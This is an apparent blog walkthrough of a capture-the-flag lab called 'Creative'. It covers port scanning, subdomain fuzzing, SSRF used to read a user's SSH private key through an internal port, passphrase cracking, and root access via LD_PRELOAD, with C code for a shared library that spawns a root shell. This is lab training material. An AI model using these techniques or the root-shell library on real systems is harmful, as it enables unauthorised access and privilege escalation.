.png)
7 months ago
119 BOOK THIS SPACE FOR AD
ARTICLE ADThis challenge focuses on vulnerabilities such as SSRF to illicitly access system files, resources along with testing for SSRF using automated tools such as SSRFMap & FFuF and Linux Privilege Escalation methods, such as manipulating the LD_PRELOAD environment variable to override standard library functions and attain elevated privileges.
Running Nmap
┌──(kali㉿kali)-[~/thm/creative]└─$ sudo nmap -T4 --min-rate 1000 -sC -sV -p- -oN nmap_report 10.10.251.164
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 15:37 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.48% done; ETC: 15:39 (0:01:51 remaining)
Nmap scan report for creative.thm (10.10.251.164)
Host is up (0.32s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
| 256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_ 256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Creative Studio | Free Bootstrap 4.3.x template
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.87 seconds
Adding the domain name to the /etc/hosts file
New Sub-Domain named beta.creative.thm found using Ffuf
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://creative.thm/" -H "Host:FUZZ.creative.thm" -fl 8Updated /etc/hosts file
URL Tester App Found On the beta.creative.thm subdomain
Note: A server’s URL tester functionality can introduce Server-side Request Forgery (SSRF) vulnerabilities. By accessing URLs on behalf of users, the server can be manipulated to probe internal network resources. This includes accessing open ports on the server itself or other servers reachable only within the internal network.
Checking for SSRF
Step 1 — Capture a POST request to the root of the beta.creative.thm subdomain and send it to the repeater and then proceed to save the request to a file names request.txt
Step 2 — Clone the SSRFmap repository and move the request.txt file to the repo directory
https://github.com/swisskyrepo/SSRFmap
Step 3 — Use the script to enumerate the ports that are open on the internal network with the help of SSRFmap
Using Ffuf to find the SSRF vulnerability alternatively
After running the tools the results clearly indicate that port 1337 is open on the localhost of the server
Exploiting the url tester app to read the id_rsa file of the user named saad URL — http://127.0.0.1:1337/home/saad/.ssh/id_rsa
Note — Right click and view page source for a properly edited key file
Trying to logon to the server via SSH with the SSH keys for the user saad
Cracking the id_rsa passphrase with john and gaining shell as saad
Logging in as saad
Credentials found in .bash_history file at /home/saad/ directory
Using sudo -l to enumerate the privileges for the user named saad
Capturing the root.txt flag
Shared libraries, facilitated by the dynamic linker (ld.so or ld-linux.so*), are integral to the execution of /usr/bin/ping.These libraries are responsible for providing essential functions and resources necessary for ping to effectively send and receive network packets.The LD_PRELOAD environment variable can be employed to specify additional shared libraries whose functions override the standard set, potentially modifying ping’s behavior. In this case this can be used to execute arbitrary code and gain a shell on the server as the root user#include <stdio.h>#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
Bengali (Bangladesh) · 
English (United States) ·